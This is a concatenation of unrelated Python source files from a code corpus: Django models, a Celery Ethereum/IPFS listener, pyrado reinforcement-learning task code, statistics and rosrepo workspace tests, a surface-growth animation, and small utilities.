class Comment(models.Model):
    # Unmanaged model generated by inspectdb; maps to the existing
    # 'comment' table (managed=False: Django will not create/alter it).
    comment_id = models.IntegerField()
    class_code = models.CharField(max_length=20)
    post_id = models.IntegerField(blank=True, null=True)
    create_date = models.DateTimeField(blank=True, null=True)
    author_id = models.CharField(max_length=20)
    content = models.TextField(blank=True, null=True)
    flag = models.IntegerField(blank=True, null=True)
    class Meta:
        managed = False
        db_table = 'comment'
class Course20182(models.Model):
    # Unmanaged model generated by inspectdb; maps to the existing
    # 'course_2018_20' table (one row per offered course).
    class_code = models.CharField(max_length=20)
    class_name = models.CharField(max_length=100)
    class_year = models.CharField(max_length=10, blank=True, null=True)
    quota = models.CharField(max_length=10, blank=True, null=True)
    instructor = models.CharField(max_length=100, blank=True, null=True)
    credit = models.CharField(max_length=10, blank=True, null=True)
    class_hour_room = models.CharField(max_length=500, blank=True, null=True)
    class_type = models.CharField(max_length=20, blank=True, null=True)
    class_lan = models.CharField(max_length=50, blank=True, null=True)
    notice = models.CharField(max_length=100, blank=True, null=True)
    campus = models.CharField(max_length=10, blank=True, null=True)
    class Meta:
        managed = False
        db_table = 'course_2018_20'
class DjangoMigrations(models.Model):
    # Read-only mirror of Django's own 'django_migrations' bookkeeping table.
    app = models.CharField(max_length=255)
    name = models.CharField(max_length=255)
    applied = models.DateTimeField()
    class Meta:
        managed = False
        db_table = 'django_migrations'
class Post(models.Model):
    # Unmanaged model generated by inspectdb; maps to the existing 'post' table.
    post_id = models.IntegerField()
    class_code = models.CharField(max_length=20)
    author_id = models.CharField(max_length=20)
    title = models.CharField(max_length=255)
    content = models.TextField(blank=True, null=True)
    create_date = models.DateTimeField(blank=True, null=True)
    hit = models.IntegerField()
    flag = models.IntegerField(blank=True, null=True)
    class Meta:
        managed = False
        db_table = 'post'
class User(models.Model):
    # Unmanaged model generated by inspectdb; maps to the existing 'user' table.
    klas_id = models.CharField(primary_key=True, max_length=20)
    naver_id = models.CharField(max_length=20, blank=True, null=True)
    lectures = models.CharField(max_length=512, blank=True, null=True)
    name = models.CharField(max_length=20, blank=True, null=True)
    class Meta:
        managed = False
        db_table = 'user'
| 1.101563 | 1 |
bdn/verification/tasks/listen_ethereum_ipfs_hash_storage.py | OpenSourceUniversity/bdn | 1 | 12797760 | import logging
from celery import shared_task
from bdn import contract
from bdn import redis
from .perform_ipfs_meta_verifications_array import (
perform_ipfs_meta_verifications_array)
logger = logging.getLogger(__name__)
@shared_task
def listen_ethereum_ipfs_hash_storage():
    """Scan Verification events since the last processed block and dispatch IPFS meta verification tasks."""
    redis_db = redis.get_redis()
    verification_storage = contract.contract('VerificationStorage')
    event = verification_storage.events.Verification
    # Resume from the last processed block (0 on first run)
    last_block = int(redis_db.get('_verification_filter_block') or 0)
    hash_filter = event.createFilter(fromBlock=last_block)
    for entry in hash_filter.get_all_entries():
        block_number = int(entry['blockNumber'])
        event_args = dict(entry['args'])
        payload = {
            'transactionHash': entry['transactionHash'].hex(),
            'blockHash': entry['blockHash'].hex(),
            'blockNumber': entry['blockNumber'],
            'args': {
                'ipfsHash': event_args.get('ipfsHash', b'').decode(),
            },
        }
        perform_ipfs_meta_verifications_array.delay(payload)
        # Persist progress so the next run starts after this block
        if block_number > last_block:
            redis_db.set('_verification_filter_block', block_number)
| 1.203125 | 1 |
src/flask_bombril/r.py | marcoprado17/flask-bone | 0 | 12797768 | <gh_stars>0
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# ======================================================================================================================
# The MIT License (MIT)
# ======================================================================================================================
# Copyright (c) 2016 [<NAME> - <EMAIL>]
# ======================================================================================================================
class Resources:
    # Aggregates app resources (strings, ids, dimensions) behind the
    # Android-style singleton access pattern R.<category>.<name> (see R below).
    def __init__(self):
        self.string = self.__Strings()
        self.id = self.__Ids()
        self.dimen = self.__Dimens()
    class __Strings:
        def __init__(self):
            self.validators = self.__Validators()
            self.test_message = "Mensagem de teste"
            self.test_message_2 = "Mensagem de teste 2"
            self.static = "static"
            self.toast = "toast"
            self.category_separator = "-"
        class __Validators:
            # Portuguese validation messages rendered by form validators
            def __init__(self):
                self.required_field = "Campo obrigatório."
                self.invalid_email_format = "Formato de email inválido."
                self.email_already_registered = "Email já cadastrado."
                self.unique_field = "Valor já registrado."
                self.field_min_length_singular = "O campo deve possuir no mínimo %(min_length)d caracter."
                self.field_min_length_plural = "O campo deve possuir no mínimo %(min_length)d caracteres."
                self.field_max_length_singular = "O campo deve possuir no máximo %(max_length)d caracter."
                self.field_max_length_plural = "O campo deve possuir no máximo %(max_length)d caracteres."
                self.field_length_range = "O campo deve possuir entre %(min_length)d e %(max_length)d caracteres."
                self.invalid_field_name = "Invalid field name '%(field_name)s'."
                self.field_must_be_equal_to = "Este campo precisa ser igual ao campo %(other_name)s."
                self.always_error = "Essa mensagem de erro sempre será lançada para esse campo"
    class __Ids:
        def __init__(self):
            self.example = "example"
    class __Dimens:
        def __init__(self):
            self.test_int = 42
            self.test_int_2 = 17
# Module-level singleton through which all resources are accessed
R = Resources()
| 1.3125 | 1 |
Pyrado/pyrado/tasks/sequential.py | jacarvalho/SimuRLacra | 0 | 12797776 | <filename>Pyrado/pyrado/tasks/sequential.py
import numpy as np
from copy import deepcopy
from typing import Sequence
import pyrado
from pyrado.spaces.base import Space
from pyrado.utils.data_types import EnvSpec
from pyrado.tasks.base import Task
from pyrado.tasks.reward_functions import RewFcn
from pyrado.utils.input_output import print_cbt
class SequentialTasks(Task):
""" Task class for a sequence of tasks a.k.a. goals """
def __init__(self,
tasks: Sequence[Task],
start_idx: int = 0,
hold_rew_when_done: bool = False,
verbose: bool = False):
"""
Constructor
:param tasks: sequence of tasks a.k.a. goals, the order matters
:param start_idx: index of the task to start with, by default with the first one in the list
:param hold_rew_when_done: if `True` reward values for done tasks will be stored and added every step
:param verbose: print messages on task completion
.. note::
`hold_rew_when_done=True` only makes sense for positive rewards.
"""
self._tasks = deepcopy(tasks)
self._idx_curr = start_idx
self.succeeded_tasks = np.full(len(self), False, dtype=bool)
self.failed_tasks = np.full(len(self), False, dtype=bool)
self.succeeded_tasks[:start_idx] = True # check off tasks which are before the start task
self.hold_rew_when_done = hold_rew_when_done
if self.hold_rew_when_done:
self.held_rews = np.zeros(len(self))
self.verbose = verbose
def __len__(self) -> int:
return len(self._tasks)
@property
def env_spec(self) -> EnvSpec:
return self._tasks[0].env_spec # safe to assume that all tasks have the same env_spec
@property
def tasks(self) -> Sequence[Task]:
""" Get the list of tasks. """
return deepcopy(self._tasks)
@property
def idx_curr(self) -> int:
""" Get the index of the currently active task. """
return self._idx_curr
@idx_curr.setter
def idx_curr(self, idx: int):
""" Set the index of the currently active task. """
if not (0 <= idx < len(self)):
raise pyrado.ValueErr(given=idx, ge_constraint='0', le_constraint=f'{len(self) - 1}')
self._idx_curr = idx
@property
def state_des(self) -> np.ndarray:
""" Get the desired state the current task. """
return self._tasks[self._idx_curr].state_des
@state_des.setter
def state_des(self, state_des: np.ndarray):
""" Set the desired state the current task. """
if not isinstance(state_des, np.ndarray):
raise pyrado.TypeErr(given=state_des, expected_type=np.ndarray)
self._tasks[self._idx_curr].state_des = state_des
@property
def space_des(self) -> Space:
""" Get the desired space the current task. """
return self._tasks[self._idx_curr].space_des
@space_des.setter
def space_des(self, space_des: Space):
""" Set the desired space the current task. """
if not isinstance(space_des, Space):
raise pyrado.TypeErr(given=space_des, expected_type=Space)
self._tasks[self._idx_curr].space_des = space_des
@property
def rew_fcn(self) -> RewFcn:
""" Get the reward function of the current task. """
return self._tasks[self._idx_curr].rew_fcn
def step_rew(self, state: np.ndarray, act: np.ndarray, remaining_steps: int) -> float:
""" Get the step reward from the current task. """
step_rew = 0.
if self.hold_rew_when_done:
for i in range(len(self)):
# Iterate over previous tasks
if self.succeeded_tasks[i] or self.failed_tasks[i]:
# Add the last reward from every done task (also true for failed tasks)
step_rew += self.held_rews[i]
if not (self.succeeded_tasks[self._idx_curr] or self.failed_tasks[self._idx_curr]):
# Only give step reward if current sub-task is active
step_rew += self._tasks[self._idx_curr].step_rew(state, act, remaining_steps)
final_rew = self._is_curr_task_done(state, act, remaining_steps) # zero if the task is not done
# self.logger.add_value('successful tasks', self.successful_tasks)
return step_rew + final_rew
def compute_final_rew(self, state: np.ndarray, remaining_steps: int) -> float:
"""
Compute the reward / cost on task completion / fail of this task.
Since this task holds multiple sub-tasks, the final reward / cost is computed for them, too.
.. note::
The `ParallelTasks` class is not a subclass of `TaskWrapper`, i.e. this function only looks at the
immediate sub-tasks.
:param state: current state of the environment
:param remaining_steps: number of time steps left in the episode
:return: final reward of all sub-tasks
"""
sum_final_rew = 0.
for t in self._tasks:
sum_final_rew += t.compute_final_rew(state, remaining_steps)
return sum_final_rew
def reset(self, **kwargs):
""" Reset all tasks. """
self.idx_curr = 0
for s in self._tasks:
s.reset(**kwargs)
# Reset internal check list for done tasks
self.succeeded_tasks = np.full(len(self), False, dtype=bool)
self.failed_tasks = np.full(len(self), False, dtype=bool)
if 'start_idx' in kwargs:
self.succeeded_tasks[:kwargs['start_idx']] = True
# Reset the stored reward values for done tasks
if self.hold_rew_when_done:
self.held_rews = np.zeros(len(self)) # doesn't work with start_idx
    def _is_curr_task_done(self,
                           state: np.ndarray,
                           act: np.ndarray,
                           remaining_steps: int,
                           verbose: bool = False) -> float:
        """
        Check if the current task is done. If so, move to the next one and return the final reward of this task.

        :param state: current state
        :param act: current action
        :param remaining_steps: number of time steps left in the episode
        :param verbose: print messages on success or failure
        :return: final reward of the current sub-task; zero if it is not done yet
        """
        if not self.succeeded_tasks[self._idx_curr] and not self.failed_tasks[self._idx_curr] and self._tasks[self._idx_curr].is_done(state):
            # Task has not been marked done yet, but is now done
            if self._tasks[self._idx_curr].has_succeeded(state):
                # Check off successfully completed task
                self.succeeded_tasks[self._idx_curr] = True
                if verbose:
                    print_cbt(f'task {self._idx_curr} has succeeded (is done) at state {state}', 'g')
            elif self._tasks[self._idx_curr].has_failed(state):
                # Check off unsuccessfully completed task
                self.failed_tasks[self._idx_curr] = True
                if verbose:
                    print_cbt(f'Task {self._idx_curr} has failed (is done) at state {state}', 'r')
            else:
                # A done task must be either a success or a failure.
                raise pyrado.ValueErr(msg=f'Task {self._idx_curr} neither succeeded or failed but is done!')
            # Memorize current reward
            if self.hold_rew_when_done:
                # Freeze the last step reward so step_rew() can keep paying it out.
                self.held_rews[self._idx_curr] = self._tasks[self._idx_curr].step_rew(state, act, remaining_steps=0)
            # Give a reward for completing the task defined by the task
            task_final_rew = self._tasks[self._idx_curr].final_rew(state, remaining_steps)
            # Advance to the next task
            self.idx_curr = (self._idx_curr + 1) % len(self)
        else:
            task_final_rew = 0.
        return task_final_rew
def has_succeeded(self, state: np.ndarray) -> bool:
"""
Check if this tasks is done. The SequentialTasks is successful if all sub-tasks are successful.
:param state: environments current state
:return: `True` if succeeded
"""
successful = np.all(self.succeeded_tasks)
if successful and self.verbose:
print_cbt(f'All {len(self)} sequential sub-tasks are done successfully', 'g')
return successful
| 2.609375 | 3 |
neuromaps/tests/test_stats.py | VinceBaz/neuromaps | 0 | 12797784 | # -*- coding: utf-8 -*-
"""
For testing neuromaps.stats functionality
"""
import numpy as np
import pytest
from neuromaps import stats
@pytest.mark.xfail
def test_compare_images():
    """Placeholder for `stats.compare_images`; marked xfail until implemented."""
    assert False
def test_permtest_metric():
    """Permutation test yields reproducible statistics for a seeded RNG."""
    rs = np.random.default_rng(12345678)
    x, y = rs.random(size=(2, 100))
    r, p = stats.permtest_metric(x, y)
    # Regression values recorded from a previous run with this seed.
    assert np.allclose([r, p], [0.0345815411043023, 0.7192807192807192])
    # 2D inputs are handled column-wise.
    r, p = stats.permtest_metric(np.c_[x, x[::-1]], np.c_[y, y])
    assert np.allclose(r, [0.0345815411043023, 0.03338608427980476])
    assert np.allclose(p, [0.7192807192807192, 0.7472527472527473])
@pytest.mark.parametrize('x, y, expected', [
    # basic one-dimensional input
    (range(5), range(5), (1.0, 0.0)),
    # broadcasting occurs regardless of input order
    (np.stack([range(5), range(5, 0, -1)], 1), range(5),
     ([1.0, -1.0], [0.0, 0.0])),
    (range(5), np.stack([range(5), range(5, 0, -1)], 1),
     ([1.0, -1.0], [0.0, 0.0])),
    # correlation between matching columns
    (np.stack([range(5), range(5, 0, -1)], 1),
     np.stack([range(5), range(5, 0, -1)], 1),
     ([1.0, 1.0], [0.0, 0.0]))
])
def test_efficient_pearsonr(x, y, expected):
    """`efficient_pearsonr` returns (correlation, p-value) pairs matching `expected`."""
    assert np.allclose(stats.efficient_pearsonr(x, y), expected)
def test_efficient_pearsonr_errors():
    """Mismatched input lengths raise ValueError; empty inputs yield NaNs."""
    with pytest.raises(ValueError):
        stats.efficient_pearsonr(range(4), range(5))
    assert all(np.isnan(a) for a in stats.efficient_pearsonr([], []))
| 1.625 | 2 |
api/get_numpy_array_from_dbase.py | fmidev/ml-feature-db | 0 | 12797792 | <gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
from configparser import ConfigParser
#from lib import mlfb
#from lib import mlfb_test4
from lib import mlfb
def main():
    """Example: query feature rows from the database into a numpy array.

    Instantiates the mlfb client and fetches all rows matching the given
    parameter name/value pair via `get_rows_from_postgre_to_numpy`.
    """
    client = mlfb.mlfb(1)
    # Parameter name and value used to filter the fetched rows.
    input_parameter = 'temperature'
    input_value = -9
    client.get_rows_from_postgre_to_numpy(input_parameter, input_value)


if __name__ == '__main__':
    main()
deepnlpf/core/execute.py | deepnlpf/deepnlpf | 3 | 12797800 | <filename>deepnlpf/core/execute.py<gh_stars>1-10
# -*- coding: utf-8 -*-
import deepnlpf.log as log
class Execute (object):
    """Execute scripts written in other programming languages (R, Java)."""

    def __init__(self):
        pass

    def run_r(self, script, *args):
        """Source an R script via rpy2 and call its `main` function with *args.

        :param script: path to the R script; must define a `main` function
        :return: whatever the R `main` function returns (an rpy2 object)
        """
        import rpy2.robjects as ro
        r = ro.r
        r.source(script)
        return r.main(*args)

    def run_java(self, jar_file, *args):
        """Run an executable JAR and return its captured stdout.

        :param jar_file: path to the .jar file; extra *args are passed to the JVM call
        :return: stdout bytes on success; `None` on any failure
                 (NOTE(review): the exception is only logged and swallowed --
                 consider re-raising so callers can distinguish failure)
        """
        try:
            import subprocess
            return subprocess.check_output(['java', '-jar', jar_file, *args], shell=False)
        except Exception as err:
            log.logger.error(err)
random surface growth/generate_anim_with_one_amoeba.py | ricsirke/simulations | 0 | 12797808 | <gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
# Grid size and lattice state: 0 = empty cell, 1 = occupied by the amoeba.
N = 100
world = np.zeros((N, N))
def get_neighs(i, j, n=None):
    """Return the 4-connected neighbors of cell (i, j) inside an n x n grid.

    :param i: row index
    :param j: column index
    :param n: grid size; defaults to the module-level constant ``N``
              (backward-compatible generalization of the old hard-coded global)
    :return: list of ``[row, col]`` pairs in the order right, down, left, up
    """
    if n is None:
        n = N
    neighs = []
    if i + 1 < n:
        neighs.append([i + 1, j])
    if j + 1 < n:
        neighs.append([i, j + 1])
    if 0 <= i - 1:
        neighs.append([i - 1, j])
    if 0 <= j - 1:
        neighs.append([i, j - 1])
    return neighs
# Seed the amoeba at the center of the grid.
starting_point_coord = int(np.floor(N/2))
starting_point = [starting_point_coord, starting_point_coord]
amoebe = [starting_point]
amoebe_mark = 1
# BUG FIX: mark the seed cell itself instead of the (0, 0) corner -- the
# perimeter list below is built around the center seed, so the occupied cell
# must be the center as well.
world[starting_point[0], starting_point[1]] = amoebe_mark
perimeters = get_neighs(*starting_point)
####################################################################
# Figure setup: the grid image plus two text counters drawn above it.
fig = plt.figure()
im = plt.imshow(world)
pos_x = 0
pos_y = -8
player_score_text_handle = plt.text(pos_x, pos_y, "blocks: 0")
perimeter_score_text_handle = plt.text(0, -3, "perimeter blocks: 0")
def animate(i):
    """Advance the growth by one step: occupy one random perimeter cell.

    Eden-style growth: pick a uniformly random cell from the perimeter list,
    mark it as part of the cluster, and extend the perimeter with its still
    unoccupied neighbors.

    :param i: frame index supplied by FuncAnimation (used only for the label)
    """
    global perimeters, world, im
    random_index = np.random.randint(0, len(perimeters))
    random_perimeter = perimeters.pop(random_index)
    print(random_perimeter)
    neighs = get_neighs(*random_perimeter)
    # Keep only neighbors that are neither occupied nor already on the perimeter.
    new_perimeters = []
    for neigh in neighs:
        if world[neigh[0], neigh[1]] != amoebe_mark and neigh not in perimeters:
            new_perimeters.append(neigh)
    perimeters = perimeters + new_perimeters
    world[random_perimeter[0], random_perimeter[1]] = amoebe_mark
    im.set_array(world)
    player_score_text_handle.set_text("player: " + str(i))
    perimeter_score_text_handle.set_text("perimeter:" + str(len(perimeters)))
# One growth step every 50 ms; render 2000 frames and save the result to disk.
interval_ms = 50
anim = FuncAnimation(fig, animate, frames=2000, interval = interval_ms, repeat = False)
plt.axis('off')
anim.save("anim.mp4")
####################################################################
#plt.show()
| 2.453125 | 2 |
practice1/5.1.py | StanislavDanilov/python3_course | 0 | 12797816 | <gh_stars>0
def day_of_week(day, month, year):
    """Return the weekday of a Gregorian date via Zeller's congruence.

    Result encoding: 0 = Saturday, 1 = Sunday, 2 = Monday, ..., 6 = Friday.

    Fixes the original (self-admittedly broken) formula: January/February must
    be treated as months 13/14 of the previous year, and the year-of-century /
    century terms were conflated.
    """
    if month < 3:
        # Zeller counts January and February as months 13/14 of the previous year.
        month += 12
        year -= 1
    k = year % 100   # year of the century
    j = year // 100  # zero-based century
    return (day + (13 * (month + 1)) // 5 + k + k // 4 + j // 4 + 5 * j) % 7


if __name__ == "__main__":
    d = int(input(": "))
    m = int(input(": "))
    y = int(input(": "))
    print(day_of_week(d, m, y))
| 2.15625 | 2 |
pyspark_db_utils/ch/__init__.py | osahp/pyspark_db_utils | 7 | 12797824 | <gh_stars>1-10
from .write_to_ch import write_to_ch
from .read_from_ch import read_from_ch
| 0.472656 | 0 |
swiftst/node/__init__.py | btorch/swift-setuptools | 0 | 12797832 | <reponame>btorch/swift-setuptools
""" Location for deploying swift nodes """
| -0.092773 | 0 |
test/test_workspace.py | fkie/rosrepo | 5 | 12797840 | <reponame>fkie/rosrepo
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: <NAME>
#
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import unittest
import os
import shutil
import yaml
import pickle
from tempfile import mkdtemp
try:
from mock import patch
except ImportError:
from unittest.mock import patch
import sys
sys.stderr = sys.stdout
from rosrepo.config import Config
import test.helper as helper
class WorkspaceTest(unittest.TestCase):
    def setUp(self):
        """Create a fake ROS root, a workspace with sample packages, and an isolated $HOME."""
        self.ros_root_dir = mkdtemp()
        self.wsdir = mkdtemp()
        self.homedir = mkdtemp()
        helper.create_fake_ros_root(self.ros_root_dir)
        # Dependency graph: alpha -> {beta -> delta, gamma}; plus packages with
        # broken/missing dependencies and deprecated packages to exercise error paths.
        helper.create_package(self.wsdir, "alpha", ["beta", "gamma", "installed-system"])
        helper.create_package(self.wsdir, "beta", ["delta"])
        helper.create_package(self.wsdir, "gamma", [])
        helper.create_package(self.wsdir, "delta", [])
        helper.create_package(self.wsdir, "epsilon", ["broken"])
        helper.create_package(self.wsdir, "broken", ["missing"])
        helper.create_package(self.wsdir, "incomplete", ["missing-system"])
        helper.create_package(self.wsdir, "ancient", [], deprecated=True)
        helper.create_package(self.wsdir, "ancient2", [], deprecated="Walking Dead")
        # Make sure the surrounding environment does not leak into the tests.
        for blacklisted_key in ["ROS_WORKSPACE", "ROS_PACKAGE_PATH"]:
            if blacklisted_key in os.environ:
                del os.environ[blacklisted_key]
        os.environ["HOME"] = self.homedir
        os.environ["XDG_CONFIG_HOME"] = os.path.join(self.homedir, ".config")
def tearDown(self):
shutil.rmtree(self.wsdir, ignore_errors=True)
shutil.rmtree(self.homedir, ignore_errors=True)
shutil.rmtree(self.ros_root_dir, ignore_errors=True)
self.ros_root_dir = None
self.wsdir = None
def get_config_value(self, key, default=None):
cfg = Config(self.wsdir, read_only=True)
return cfg.get(key, default)
    def test_bash(self):
        """Test proper behavior of 'rosrepo bash'"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        # Known variables are printed as assignments; unknown ones as a comment.
        self.assertEqual(
            helper.run_rosrepo("bash", "-w", self.wsdir, "ROS_WORKSPACE", "ROS_PACKAGE_PATH", "PATH", "UNKNOWN"),
            (0, "ROS_WORKSPACE=%(wsdir)s\nROS_PACKAGE_PATH=%(wsdir)s/src\nPATH=%(env_path)s\n# variable UNKNOWN is not set\n" % {"wsdir": self.wsdir, "env_path": os.environ["PATH"]})
        )
        # Per-package entries of this workspace are collapsed into the single src folder.
        os.environ["ROS_PACKAGE_PATH"] = os.pathsep.join(["/before"] + ["%s/src/%s" % (self.wsdir, d) for d in ["alpha", "beta", "gamma"]] + ["/after"])
        self.assertEqual(
            helper.run_rosrepo("bash", "-w", self.wsdir),
            (0, "ROS_WORKSPACE=%(wsdir)s\nROS_PACKAGE_PATH=/before%(sep)s%(wsdir)s/src%(sep)s/after\n" % {"wsdir": self.wsdir, "sep": os.pathsep})
        )
    def test_clean(self):
        """Test proper behavior of 'rosrepo clean'"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        os.makedirs(os.path.join(self.wsdir, "build"))
        # --dry-run must leave the build folder untouched.
        exitcode, stdout = helper.run_rosrepo("clean", "-w", self.wsdir, "--dry-run")
        self.assertEqual(exitcode, 0)
        self.assertTrue(os.path.isdir(os.path.join(self.wsdir, "build")))
        # A real clean removes it.
        exitcode, stdout = helper.run_rosrepo("clean", "-w", self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertFalse(os.path.isdir(os.path.join(self.wsdir, "build")))
    def test_upgrade_from_version_1(self):
        """Test if workspaces from rosrepo 1.x are migrated properly"""
        # rosrepo 1.x layout: packages live in 'repos' with symlinks from 'src',
        # plus a YAML .metainfo file holding the auto/pin flags.
        os.rename(os.path.join(self.wsdir, "src"), os.path.join(self.wsdir, "repos"))
        os.makedirs(os.path.join(self.wsdir, "src"))
        with open(os.path.join(self.wsdir, "src", "CMakeLists.txt"), "w"):
            pass
        with open(os.path.join(self.wsdir, "src", "toplevel.cmake"), "w"):
            pass
        with open(os.path.join(self.wsdir, ".catkin_workspace"), "w"):
            pass
        os.symlink(os.path.join("..", "repos", "alpha"), os.path.join(self.wsdir, "src", "alpha"))
        os.symlink(os.path.join("..", "repos", "beta"), os.path.join(self.wsdir, "src", "beta"))
        os.symlink(os.path.join("..", "repos", "gamma"), os.path.join(self.wsdir, "src", "gamma"))
        os.symlink(os.path.join("..", "repos", "delta"), os.path.join(self.wsdir, "src", "delta"))
        with open(os.path.join(self.wsdir, "repos", ".metainfo"), "w") as f:
            f.write(yaml.safe_dump(
                {
                    "alpha": {"auto": False, "pin": False},
                    "beta": {"auto": False, "pin": True},
                    "gamma": {"auto": True, "pin": False},
                    "delta": {"auto": True, "pin": False},
                },
                default_flow_style=False
            ))
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertEqual(
            helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
            (0, "alpha\nbeta\ndelta\ngamma\n")
        )
        # Non-auto packages become the build sets; the pin flag is preserved.
        self.assertEqual(self.get_config_value("default_build"), ["alpha"])
        self.assertEqual(self.get_config_value("pinned_build"), ["beta"])
    def test_upgrade_from_version_2(self):
        """Test if workspaces from rosrepo 2.x are migrated properly"""
        # rosrepo 2.x layout: catkin_tools profile plus pickled metadata in .rosrepo/info.
        with open(os.path.join(self.wsdir, ".catkin_workspace"), "w"):
            pass
        os.makedirs(os.path.join(self.wsdir, ".catkin_tools", "profiles", "rosrepo"))
        os.makedirs(os.path.join(self.wsdir, ".rosrepo"))
        from rosrepo.common import PkgInfo
        with open(os.path.join(self.wsdir, ".rosrepo", "info"), "wb") as f:
            metadata = {}
            metadata["alpha"] = PkgInfo()
            metadata["beta"] = PkgInfo()
            metadata["alpha"].selected = True
            metadata["beta"].selected = True
            metadata["beta"].pinned = True
            f.write(pickle.dumps(metadata))
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertEqual(
            helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
            (0, "alpha\nbeta\ndelta\ngamma\n")
        )
        # selected -> default build; pinned -> pinned build.
        self.assertEqual(self.get_config_value("default_build"), ["alpha"])
        self.assertEqual(self.get_config_value("pinned_build"), ["beta"])
    def test_upgrade_from_older_version_3(self):
        """Test if workspaces from rosrepo 3.x are upgraded to latest version"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "alpha")
        self.assertEqual(exitcode, 0)
        # Pretend the workspace was created by an older 3.x release.
        cfg = Config(self.wsdir)
        cfg["version"] = "3.0.0a0"
        cfg.write()
        self.assertEqual(
            helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
            (0, "alpha\nbeta\ndelta\ngamma\n")
        )
        # Running any command bumps the stored version to the current release.
        from rosrepo import __version__ as rosrepo_version
        self.assertEqual(self.get_config_value("version"), rosrepo_version)
    def test_incompatible_new_version(self):
        """Test if workspaces from future rosrepo versions are detected"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        # Fake a workspace written by a (much) newer rosrepo release.
        cfg = Config(self.wsdir)
        cfg["version"] = "999.0"
        cfg.write()
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-n")
        self.assertEqual(exitcode, 1)
        self.assertIn("newer version", stdout)
    def test_buildset(self):
        """Test proper behavior of 'rosrepo include' and 'rosrepo exclude'"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        # --dry-run must not modify the default build set.
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--dry-run", "alpha")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("default_build", []), [])
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "alpha")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("default_build"), ["alpha"])
        self.assertEqual(self.get_config_value("pinned_build"), [])
        # Dependencies (beta, gamma, delta) are pulled in automatically.
        self.assertEqual(
            helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
            (0, "alpha\nbeta\ndelta\ngamma\n")
        )
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--pinned", "beta")
        self.assertEqual(exitcode, 0)
        self.assertEqual(
            helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
            (0, "alpha\nbeta\ndelta\ngamma\n")
        )
        self.assertEqual(self.get_config_value("pinned_build"), ["beta"])
        # Excluding everything keeps pinned packages and their dependencies.
        exitcode, stdout = helper.run_rosrepo("exclude", "-w", self.wsdir, "-a")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("default_build"), [])
        self.assertEqual(
            helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
            (0, "beta\ndelta\n")
        )
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "beta")
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("exclude", "-w", self.wsdir, "--pinned", "beta")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("default_build"), ["beta"])
        self.assertEqual(self.get_config_value("pinned_build"), [])
        # Packages with unresolvable dependencies must be rejected and leave
        # both build sets unchanged.
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--pinned", "epsilon")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot resolve dependencies", stdout)
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "epsilon")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot resolve dependencies", stdout)
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "--all")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot resolve dependencies", stdout)
        self.assertEqual(self.get_config_value("default_build"), ["beta"])
        self.assertEqual(self.get_config_value("pinned_build"), [])
        # Missing system dependencies only trigger an installation hint.
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "incomplete")
        self.assertEqual(exitcode, 0)
        self.assertIn("apt-get install", stdout)
        # Deprecated packages warn (including the custom deprecation message).
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "ancient", "ancient2")
        self.assertEqual(exitcode, 0)
        self.assertIn("is deprecated", stdout)
        self.assertIn("Walking Dead", stdout)
        # 'init --reset' wipes the build folder and both build sets.
        os.makedirs(os.path.join(self.wsdir, "build"))
        exitcode, stdout = helper.run_rosrepo("init", "--reset", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertFalse(os.path.isdir(os.path.join(self.wsdir, "build")))
        self.assertEqual(self.get_config_value("default_build", []), [])
        self.assertEqual(self.get_config_value("pinned_build", []), [])
